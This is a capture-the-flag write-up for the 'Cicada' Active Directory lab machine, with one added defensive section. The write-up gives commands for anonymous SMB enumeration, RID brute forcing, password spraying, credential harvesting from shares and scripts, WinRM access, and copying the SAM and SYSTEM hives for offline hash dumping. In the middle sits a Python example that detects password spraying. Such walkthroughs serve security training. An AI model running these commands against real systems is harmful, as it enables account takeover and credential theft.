Cicada (HTB – Easy)

This machine is an Active Directory environment where initial access is obtained through anonymous SMB access and password reuse. Multiple user accounts are chained until WinRM access is achieved. Privilege escalation relies on backup-related privileges to obtain local hashes and move to full compromise.

Overview

Target: 10.10.11.35
Domain: cicada.htb
Initial vector: guest SMB access → password disclosure
Privilege escalation: backup privileges to access SAM/SYSTEM

Enumeration

Anonymous SMB access:

$ smbmap -u guest -p "" -d . -H 10.10.11.35
Shares:
HR (READ ONLY)
DEV (NO ACCESS)
...

List and download from HR:

$ smbmap -u guest -p "" -d . -H 10.10.11.35 -r HR
$ smbmap -u guest -p "" -d . -H 10.10.11.35 --download 'HR\Notice from HR.txt'
-> Password: Cicada$M6Corpb*@Lp#nZp!8

User Enumeration

RID brute with guest:

$ nxc smb 10.10.11.35 -u "guest" -p '' --rid-brute
-> Users: john.smoulder, sarah.dantelia, michael.wrightson, david.orelious, emily.oscars, ...

Spray the recovered password:

$ nxc smb 10.10.11.35 -u Potential_Users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
-> Valid: michael.wrightson
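A defensive counterpart to the spray step above, added here and not part of the original writeup: it runs over constructed sample logon records (assumed to be pre-parsed 4625/4624 events from the DC's Security log) and flags a source that fails against many distinct accounts in a short window, which is the footprint one password tried across a RID-bruted user list leaves behind.

```python
"""Flag password-spray patterns in Windows logon telemetry (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records, not real telemetry:
# (timestamp, event_id, target account, source IP)
SAMPLE_EVENTS = [
    ("2024-09-28T10:00:01", 4625, "john.smoulder",     "10.10.14.5"),
    ("2024-09-28T10:00:02", 4625, "sarah.dantelia",    "10.10.14.5"),
    ("2024-09-28T10:00:02", 4624, "michael.wrightson", "10.10.14.5"),
    ("2024-09-28T10:00:03", 4625, "david.orelious",    "10.10.14.5"),
    ("2024-09-28T10:00:03", 4625, "emily.oscars",      "10.10.14.5"),
    # One user mistyping their own password twice is not a spray.
    ("2024-09-28T10:05:00", 4625, "emily.oscars",      "10.10.14.9"),
    ("2024-09-28T10:05:10", 4625, "emily.oscars",      "10.10.14.9"),
]


def detect_spray(events, window=timedelta(minutes=5), min_accounts=4):
    """Return {source_ip: {"accounts": [...], "successes": [...]}} for every
    source that produced failed logons (4625) against at least `min_accounts`
    distinct accounts inside `window`. The signal is breadth of accounts per
    source, not failures per account, so a lockout threshold alone misses it."""
    failures = defaultdict(list)   # ip -> [(time, account)]
    successes = defaultdict(set)   # ip -> {account}
    for ts, event_id, account, ip in events:
        t = datetime.fromisoformat(ts)
        if event_id == 4625:
            failures[ip].append((t, account))
        elif event_id == 4624:
            successes[ip].add(account)

    alerts = {}
    for ip, fails in failures.items():
        fails.sort()
        # Slide the window start over each failure and count distinct targets.
        for i, (start, _) in enumerate(fails):
            accounts = {acct for t, acct in fails[i:] if t - start <= window}
            if len(accounts) >= min_accounts:
                alerts[ip] = {"accounts": sorted(accounts),
                              "successes": sorted(successes[ip])}
                break
    return alerts
```

A success from the same source during the spray window (michael.wrightson here) is the account to reset first.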

Further enumeration with Michael:

$ enum4linux -a -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' 10.10.11.35
-> description for david.orelious: "Just in case I forget my password is aRt$Lp#7t*VQ!3"

Access DEV share as David:

$ smbmap -H 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' -d .
$ smbmap -H 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' -r 'DEV'
$ smbmap -H 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --download 'DEV/Backup_script.ps1'

Backup_script.ps1 contains credentials:

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force

Foothold

WinRM access as Emily:

$ nxc winrm 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' -X 'ipconfig'
$ evil-winrm -i 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'

At this point, user access is obtained and user.txt can be read.

Privilege Escalation

Privilege enumeration (e.g. with winPEAS or manual checks) shows backup-related privileges such as SeBackupPrivilege.

Typical approach:

whoami /priv

With backup privileges, it is possible to read sensitive system files (SAM and SYSTEM) by abusing backup semantics. One common method is to copy or dump:

C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM

These files can be exfiltrated and processed offline (e.g. using impacket-secretsdump) to recover local administrator hashes, then reused for lateral movement or local admin access.

Conclusion

The machine chains weak information disclosure (HR share), password reuse, and embedded credentials in backup scripts to move across multiple users. Privilege escalation is achieved by abusing backup privileges to access protected system files and recover administrator credentials, resulting in full compromise.